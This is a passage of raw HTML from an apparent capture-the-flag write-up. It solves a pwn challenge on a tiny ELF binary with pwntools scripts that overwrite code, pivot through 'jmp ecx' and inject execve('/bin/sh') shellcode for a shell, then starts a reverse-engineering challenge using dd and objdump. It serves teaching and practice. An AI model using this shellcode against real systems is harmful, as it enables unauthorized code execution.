url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7UlEQVQoz3WS21PaQBTG89AZCeCIgNY6BZoSEgLZ3STCJlyCxQITLxVEW8d2ptMnO33p9P9/+Xp2RftQffjN2evZ831njV5D4sQaw8+74KYLtoGbbT3vFhi62yFYsQuuzhTaL9CByDswYucIayvGbNtGWvUxrUtM3oSIyx2MXwvMaE/uuBA5C0G+icB8ifc6GokrcRPM0SvaCOmCyNt0kSi0NFHR0fFpfYN4BrVOCWMsnDk8U0nykJS7iHY88C16kWD0Ks819VhQVHNm2nocbBG5B0SO9lWFwhIYlzhOD4cYNQY4F1OsWmOqqom4FuKYbFjYA4ysPjjZMigQSnrJgai0IVQsuwjKbYSkxIgOe5i5x8jcKSVMkNQkRiWGqMIhyEtZJLMrEmw/gNj1EdM8UQ2gMaty8F0GVmEQewHCogfjtJXi9/U9vqVrXAUL3A0ukTb6OCqRfKquV+1q+ezVOx05+aRki40N/yQ3HySfeR/w6/IHvsQXWIo5bpNPmJJEecDQrweYukOMD0IMqeN9ekR59VxjHteMzJ3gz+efuButsI4yikssqetze4QL/wT359/xNV3hliq/on2dSH2TxyTm5mdsvo8xedvX1WVOio9Wgows6O37CKsdyFqA2JOIqDmyTuz5/yUUT0lbmr/zzCbw+4M85wAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9a1022d837403ce7cb185de9c0535dfa/8ac56/image-20240225152235545.webp 240w,\n/static/9a1022d837403ce7cb185de9c0535dfa/d3be9/image-20240225152235545.webp 480w,\n/static/9a1022d837403ce7cb185de9c0535dfa/184c4/image-20240225152235545.webp 833w\"\n              sizes=\"(max-width: 833px) 100vw, 833px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9a1022d837403ce7cb185de9c0535dfa/8ff5a/image-20240225152235545.png 240w,\n/static/9a1022d837403ce7cb185de9c0535dfa/e85cb/image-20240225152235545.png 480w,\n/static/9a1022d837403ce7cb185de9c0535dfa/5205c/image-20240225152235545.png 833w\"\n            sizes=\"(max-width: 833px) 100vw, 833px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9a1022d837403ce7cb185de9c0535dfa/5205c/image-20240225152235545.png\"\n            alt=\"image-20240225152235545\"\n            title=\"image-20240225152235545\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Let’s try feeding byte data created with <code class=\"language-text\">python3 -c 'import sys; sys.stdout.buffer.write(b\"\\x90\"*0x18)' > data</code> as input.</p>\n<p>As shown below, we can confirm that the code was successfully overwritten with the input values.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 820px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/234e47122c5334b88746dca917d19fcb/9f82e/image-20240225153156591.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.66666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABQ0lEQVQoz4WRS0/CUBCFu+MdSsHKikihXFp6X1VCC1QhCCQQE4MLVyZs/f8/4DgXi0FcuPgyj3OTuWfGEp0YG7ZAcqPAiz5EmYGXBgQ75aIyQlTT4FUOeaqHf8n7RrcU01j4G6j2M3hNIWtL7IIn7MMFxjY9KnahSgaP6P2Lpfoah3iL2a2AKNxBUtOgKz5UuU9T+z/xnKur3qVmaUaWhxtIO0ZQCDCxQyRNTpZpYvEbYYbkuYlGExf6iYLRPFiCLDMnheockHTWWLIpXvUab+wRD+4IwmFIabJu0J6aQ8T1AWZUJxX6lUMroZ48a05Alt2YdphhF66w8jKk3SnGLYm0HkE0OD2McF+LKdJhnAjKjpBUQ4wJbpwQohGBtwRUU8CauxKfL0ccV+/Yj5b4yA7Y+nNM2uLKMh2F+G3Zy+nlmocvfN7JSyMwLlkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/234e47122c5334b88746dca917d19fcb/8ac56/image-20240225153156591.webp 240w,\n/static/234e47122c5334b88746dca917d19fcb/d3be9/image-20240225153156591.webp 480w,\n/static/234e47122c5334b88746dca917d19fcb/b1f58/image-20240225153156591.webp 820w\"\n              sizes=\"(max-width: 820px) 100vw, 820px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/234e47122c5334b88746dca917d19fcb/8ff5a/image-20240225153156591.png 240w,\n/static/234e47122c5334b88746dca917d19fcb/e85cb/image-20240225153156591.png 480w,\n/static/234e47122c5334b88746dca917d19fcb/9f82e/image-20240225153156591.png 820w\"\n            sizes=\"(max-width: 820px) 100vw, 820px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/234e47122c5334b88746dca917d19fcb/9f82e/image-20240225153156591.png\"\n            alt=\"image-20240225153156591\"\n            title=\"image-20240225153156591\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To find the foothold for obtaining a shell, let’s think about what values are in the registers at the point when the system call is issued.</p>\n<p>Immediately after the system call returns, ecx should still hold the base address, and edx should still hold the length value set earlier.</p>\n<p>eax contains the return value of <code class=\"language-text\">read</code>, which is the size of the input in bytes.</p>\n<p>From this, issuing a <code class=\"language-text\">jmp ecx</code> instruction would jump to the start of the 0x18-byte region we overwrote, allowing us to chain into arbitrary code execution.</p>\n<p>To verify that the exploit actually works, let’s try running the following code.</p>\n<p>Here, we send an 18-byte shellcode <code class=\"language-text\">b'\\x90\\x90\\x90\\x90\\xb8\\x04\\x00\\x00\\x00\\xbb\\x01\\x00\\x00\\x00\\xcd\\x80\\xff\\xe1'</code> to the program.</p>\n<p>We leave edx and ecx unchanged due to byte-size constraints, but the code uses the <code class=\"language-text\">sys_write</code> system call to output the data at the base address still stored in ecx to stdout.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># p = remote(\"0.cloud.chals.io\", 20922)</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./download.elf\"</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token triple-quoted-string string\">\"\"\"\n    nop\n    nop\n    nop\n    nop\n    mov eax, 4\n    mov ebx, 1\n    int 0x80\n    jmp ecx\n\"\"\"</span><span class=\"token punctuation\">)</span>\n\np<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this script confirms that the byte data starting with NOPs is returned on stdout.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f2fe1a6325f2ecb996f057d5c41fce36/1790f/image-20240225172502405.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 34.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/ElEQVQoz1VQ7VLCQAy8p1H8eAKkXFtxBgFHaCtCP67g+7/Dms3lqvzIJNnb7Cbn2pc92sUeu6cSH8+l5ALbxxw7qTcPObbWb2Ye67sM6/sl3iVY32Sr3aU8ovc1QvGF6+qEy+u3xnUVM99v68j5eTtLnDAKxiDG7AbfIEaNIW9UvF0c0C8riVpjFDPmLqvQyRsz+SGPc5Fb4Tz/pKABtiWHacCegwknpgI0FfFpAa0b5XTZAS4oWGmTNmKfRLU38cRRMTMglt6Y3WCuJOh2ZpBO5hD/Jtg2am6GxMn/W0oEO19NJ4/FcRId/v0Pzwk2GM+P39D7evpLPVm4v+NyCoNkl1n9AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f2fe1a6325f2ecb996f057d5c41fce36/8ac56/image-20240225172502405.webp 240w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/d3be9/image-20240225172502405.webp 480w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/e46b2/image-20240225172502405.webp 960w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/1671b/image-20240225172502405.webp 1189w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f2fe1a6325f2ecb996f057d5c41fce36/8ff5a/image-20240225172502405.png 240w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/e85cb/image-20240225172502405.png 480w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/d9199/image-20240225172502405.png 960w,\n/static/f2fe1a6325f2ecb996f057d5c41fce36/1790f/image-20240225172502405.png 1189w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f2fe1a6325f2ecb996f057d5c41fce36/d9199/image-20240225172502405.png\"\n            alt=\"image-20240225172502405\"\n            title=\"image-20240225172502405\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This confirms that arbitrary code execution via <code class=\"language-text\">jmp ecx</code> is possible.</p>\n<p>Finally, we obtain a shell using the following solver script.</p>\n<p>Here, we use a second <code class=\"language-text\">read</code> call to write up to 0x7f bytes into the region immediately following the <code class=\"language-text\">jmp ecx</code> instruction, chaining into shellcode execution to obtain a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># p = remote(\"0.cloud.chals.io\", 20922)</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./download.elf\"</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token triple-quoted-string string\">\"\"\"\n    nop\n    nop\n    nop\n    nop\n    nop\n    nop\n    nop\n    mov al, 0x3\n    add ecx,0x12\n    mov dl, 0x7f\n    int 0x80\n    jmp ecx\n\"\"\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># print(shellcraft.sh())</span>\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token triple-quoted-string string\">\"\"\"\n    /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n    /* push b'/bin///sh\\x00' */\n    push 0x68\n    push 0x732f2f2f\n    push 0x6e69622f\n    mov ebx, esp\n    /* push argument array ['sh\\x00'] */\n    /* push 'sh\\x00\\x00' */\n    push 0x1010101\n    xor dword ptr [esp], 0x1016972\n    xor ecx, ecx\n    push ecx /* null terminate */\n    push 4\n    pop ecx\n    add ecx, esp\n    push ecx /* 'sh\\x00' */\n    mov ecx, esp\n    xor edx, edx\n    /* call execve() */\n    push SYS_execve /* 0xb */\n    pop eax\n    int 0x80\n\"\"\"</span><span class=\"token punctuation\">)</span>\n\np<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>shellcode<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this solver retrieves the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 801px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/200ead58abbb7c9037b931df927eb867/2ad15/image-20240225172815610.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA40lEQVQY012N206DUBBF0aitGm3ii30okUspGBBILLdSpEA5jWnF+NL4/z+yPKVp0viwMrNn9p5RMjthkwlE2iLCCuEJSruhmK6onLXs1+TmikRdkBsfcl6xtGoap+E7aGn0lHIyp9FS8ucAZWsVdG7NRl/QahnCzPicLWmlURgZxThg/jDriR5topFNPHJ4lzq8m+Jev/A20PFuNPyBgfIbb+nkp9PSuZjweqn21b06mA38oYl/ax7r0DgidSAJ760+e0L58Wr26Rf7ZMfOrai1hEqN6JyS+Mntw+eB//RHz/QfEud4BSOE9uQAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/200ead58abbb7c9037b931df927eb867/8ac56/image-20240225172815610.webp 240w,\n/static/200ead58abbb7c9037b931df927eb867/d3be9/image-20240225172815610.webp 480w,\n/static/200ead58abbb7c9037b931df927eb867/99a1d/image-20240225172815610.webp 801w\"\n              sizes=\"(max-width: 801px) 100vw, 801px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/200ead58abbb7c9037b931df927eb867/8ff5a/image-20240225172815610.png 240w,\n/static/200ead58abbb7c9037b931df927eb867/e85cb/image-20240225172815610.png 480w,\n/static/200ead58abbb7c9037b931df927eb867/2ad15/image-20240225172815610.png 801w\"\n            sizes=\"(max-width: 801px) 100vw, 801px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/200ead58abbb7c9037b931df927eb867/2ad15/image-20240225172815610.png\"\n            alt=\"image-20240225172815610\"\n            title=\"image-20240225172815610\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"binary-shrinkrev\" style=\"position:relative;\"><a href=\"#binary-shrinkrev\" aria-label=\"binary shrinkrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Binary shrink(Rev)</h2>\n<blockquote>\n<p>After hearing about young computer problems, you have decided to become a computer shrink. Your first patient is a robot elf.</p>\n<p>“A little machine dream I keep having, ” she says. “But when it is over, I always forget the end. I’ve captured the dream’s program, but I don’t dare look”.</p>\n<p>Can you run the program for her? Are you able to figure out what’s in her memory right before execution stops?</p>\n</blockquote>\n<p>Running the ELF file provided as the challenge binary simply printed the string <code class=\"language-text\">>:)</code> and exited.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 930px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/63ba31d54f9a1a85edf0aa969df7df43/416ee/image-20240225173104444.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 9.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhklEQVQI1y2LSw6CMABEuYEKrCSCGk0kxgKtfKRagr+FxrDS+9/kWdDFy5vMZBwjDT31sqCeNxwWPQa9atHrC2V4tFtDFZ3Qti+tH7s7nbjyqV68iyddcsMEijYscPJZigoEyt8i3YTMs1hLL0X6GdlE2PzvXDFYT3/nc1QO7EexZUM+jvkCBUw+VFukensAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/63ba31d54f9a1a85edf0aa969df7df43/8ac56/image-20240225173104444.webp 240w,\n/static/63ba31d54f9a1a85edf0aa969df7df43/d3be9/image-20240225173104444.webp 480w,\n/static/63ba31d54f9a1a85edf0aa969df7df43/6eb96/image-20240225173104444.webp 930w\"\n              sizes=\"(max-width: 930px) 100vw, 930px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/63ba31d54f9a1a85edf0aa969df7df43/8ff5a/image-20240225173104444.png 240w,\n/static/63ba31d54f9a1a85edf0aa969df7df43/e85cb/image-20240225173104444.png 480w,\n/static/63ba31d54f9a1a85edf0aa969df7df43/416ee/image-20240225173104444.png 930w\"\n            sizes=\"(max-width: 930px) 100vw, 930px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/63ba31d54f9a1a85edf0aa969df7df43/416ee/image-20240225173104444.png\"\n            alt=\"image-20240225173104444\"\n            title=\"image-20240225173104444\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reading the problem statement, it seems the flag is written into memory during program execution.</p>\n<p>I initially thought gdb would handle this easily, but just like the previous challenge, this binary uses Tiny ELF techniques, so gdb could not analyze it properly.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 837px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7aaccd16670fa2c540287d57d820e6b8/ddc81/image-20240225173321665.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABrklEQVQoz22R21PaQBSHeWnH1qkdrW2nTKsoULwAiQJJkCQQknBRAYEEFVQu04t96P//+HV37Uyn0z58c3ZPZr/9nU2i63RxNJtG3sZNu9QPQuyMh3cY4uQCnM8+/nEbR/TKSQtzp0ZhU8dMmrQyNcK05IxuzqX6tkji52BFdNpl4U0EMV/CG+aNiK+dKctmLHoR3zozVsGEft7D/aBTfZPH2jqi/PqQwvMUecmzFMW1fRLfL+eMSh3mzQkPjVgxc0cs/GtRx2otv93XI5HIVincj2WcZImzdxon61n0lxn09YyqiR+9BeNSV4giHkTCZSAS/q5SclcfsxKpV+EtrayN9iKtkpU3Dii9yqm9REmVsL9kdNphag+VQIqvrR53Il1cuVDre9F7SlgTqYoEe1X8PYvmrqkk/xXKgxIplokn5qXiptonNi6IKudc6S110UALqb3XBLoYNfu38LE3Z1AMGJel5EkoxTNnqNZSqN5T7NtZh37Bx9s18FOW4p+RH8UbDk/aTGtX6rBMFexX1TiSxqcK3o5BM2VibRew5B/ezmNsHWNsHqGt/ZFJfgGaQw6rlyh+6QAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7aaccd16670fa2c540287d57d820e6b8/8ac56/image-20240225173321665.webp 240w,\n/static/7aaccd16670fa2c540287d57d820e6b8/d3be9/image-20240225173321665.webp 480w,\n/static/7aaccd16670fa2c540287d57d820e6b8/a6125/image-20240225173321665.webp 837w\"\n              sizes=\"(max-width: 837px) 100vw, 837px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7aaccd16670fa2c540287d57d820e6b8/8ff5a/image-20240225173321665.png 240w,\n/static/7aaccd16670fa2c540287d57d820e6b8/e85cb/image-20240225173321665.png 480w,\n/static/7aaccd16670fa2c540287d57d820e6b8/ddc81/image-20240225173321665.png 837w\"\n            sizes=\"(max-width: 837px) 100vw, 837px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7aaccd16670fa2c540287d57d820e6b8/ddc81/image-20240225173321665.png\"\n            alt=\"image-20240225173321665\"\n            title=\"image-20240225173321665\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The entry point is at 0x8048009.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bbe061122be11488a66d9438bc57270c/b6e34/image-20240225173630827.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACQElEQVQ4y3VTZ1PbUBDUTBIcYgIBMsQQinuTZFmSe5Uty5Z7XGBIQj7k//+Izd0Ze2IGPty8ond3e7srxdPa6BsOqtcmKiEb5VBBonFXQ/WqiOKFSWcb1lkO9qmK+rc8yucaahcG6qE8rKMkjMMY8p/iEspU7WKYaMIIRFE4TklYRwk06fHK9jFVO2hfWWhdmmhQMU7OBSLQn2NbbLsqY0pYWAPYx2loBxG55IeMYphuY5x10KSCpdMsrM8pmMHEDs029hBywo98H8UvGUnijzoVbhCih/IEg0QDbqQiweO+HPFlKCNCsS6MMNVcLMw+etGqIGSOfjcX6Mfrclc6U5H7GH0V1V7BQbKJWa6HCY0+Nzy0rwvEURSVrzqWlo/uXZnQ87jJN1HtFRw+I3yszvCnvZK99iGMMiFiKqQBIWMauNFWDDnTPSP9PxROui+NsS6OsCRVH2tzEsnHTO+JWK3vNrrhsqxc3LkpSnRuS0JLhcSr0jS8t0k0xbdcuHkHnu7ATXbg53xM7AncTA9etoe+6mFoDNHLuJhbm0m48U9qzE1b5IAGWYybFU7SNHKqJUr6tDKPowxZJeOIGIyieWnJ40bIpL0pZ7YRI2ZaCicbd/CeHaBMta74bWkPhTNOYCE4iYVhP2oHYWTf3SD7/lb2Wx6Zw10ENnwqjMQNV+jPMAURc6JTEo/hkV3MYFzM7MVqgpR/gNfMvVOZDVw6V6EHYyLIk3OPZWmKFan91/uFh+pc7MTnJ2ct4nHRt3z4D78HjGEgPjyvAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bbe061122be11488a66d9438bc57270c/8ac56/image-20240225173630827.webp 240w,\n/static/bbe061122be11488a66d9438bc57270c/d3be9/image-20240225173630827.webp 480w,\n/static/bbe061122be11488a66d9438bc57270c/e46b2/image-20240225173630827.webp 960w,\n/static/bbe061122be11488a66d9438bc57270c/33ecb/image-20240225173630827.webp 1103w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bbe061122be11488a66d9438bc57270c/8ff5a/image-20240225173630827.png 240w,\n/static/bbe061122be11488a66d9438bc57270c/e85cb/image-20240225173630827.png 480w,\n/static/bbe061122be11488a66d9438bc57270c/d9199/image-20240225173630827.png 960w,\n/static/bbe061122be11488a66d9438bc57270c/b6e34/image-20240225173630827.png 1103w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bbe061122be11488a66d9438bc57270c/d9199/image-20240225173630827.png\"\n            alt=\"image-20240225173630827\"\n            title=\"image-20240225173630827\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since neither a decompiler nor <code class=\"language-text\">objdump</code> could extract the correct code as-is, I first stripped the header with <code class=\"language-text\">dd if=binary_shrink of=outdata bs=1 skip=9</code> and then obtained the assembly via <code class=\"language-text\">objdump -D -Mintel,x86-64 -b binary -m i386 outdata</code>.</p>\n<p>It appears the binary begins by calling the address at offset 58 (0x31+9) of the original file, but the subsequent processing is not disassembled correctly.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0c971463728c232bff6464b0cbfb5c3c/187fa/image-20240225180035936.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 29.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCUlEQVQY042QX1OCQBTFedJ01NIaS5tqACWUhV1QCAQy8U/iaL000/f/JKe7S8/lw2/u3Xt3zz13tcSYI7h3EQ0ForsQ0SCE6AmwjgNXwcDaU8yuPRSPEdJbgXwY4O0hpJwjG/iqtqLeos+hZX2BpMfw0nWQyQuE3zTB6zr4hQHRqJC5W9Ph1SlST+JRzav/1mrVWSsnS+zGKbbmQk2bdWwE7WeEVxPML22I5gh+a6ziOWjS9sFeYm/lJGSpiRsjQUm1r/CAT77F6ilSjuQD3jD/Foy6UxxZgXcSVCsQu1GKD2+jBL/jk/qfoGWd5zCnNUv7FUenqByS4FqPK1G3Ej2xNeIb9193kh8ARK8c34W6pgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0c971463728c232bff6464b0cbfb5c3c/8ac56/image-20240225180035936.webp 240w,\n/static/0c971463728c232bff6464b0cbfb5c3c/d3be9/image-20240225180035936.webp 480w,\n/static/0c971463728c232bff6464b0cbfb5c3c/e46b2/image-20240225180035936.webp 960w,\n/static/0c971463728c232bff6464b0cbfb5c3c/de1dc/image-20240225180035936.webp 1194w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0c971463728c232bff6464b0cbfb5c3c/8ff5a/image-20240225180035936.png 240w,\n/static/0c971463728c232bff6464b0cbfb5c3c/e85cb/image-20240225180035936.png 480w,\n/static/0c971463728c232bff6464b0cbfb5c3c/d9199/image-20240225180035936.png 960w,\n/static/0c971463728c232bff6464b0cbfb5c3c/187fa/image-20240225180035936.png 1194w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0c971463728c232bff6464b0cbfb5c3c/d9199/image-20240225180035936.png\"\n            alt=\"image-20240225180035936\"\n            title=\"image-20240225180035936\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Next, I extract and analyze the data starting at byte 58 (0x31+9) using <code class=\"language-text\">dd if=binary_shrink of=outdata bs=1 skip=58</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d4c7db6e7274fb38370d08b06c539867/7798c/image-20240225180121067.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.583333333333336%; position: relative; bottom: 0; left: 0; background-image: 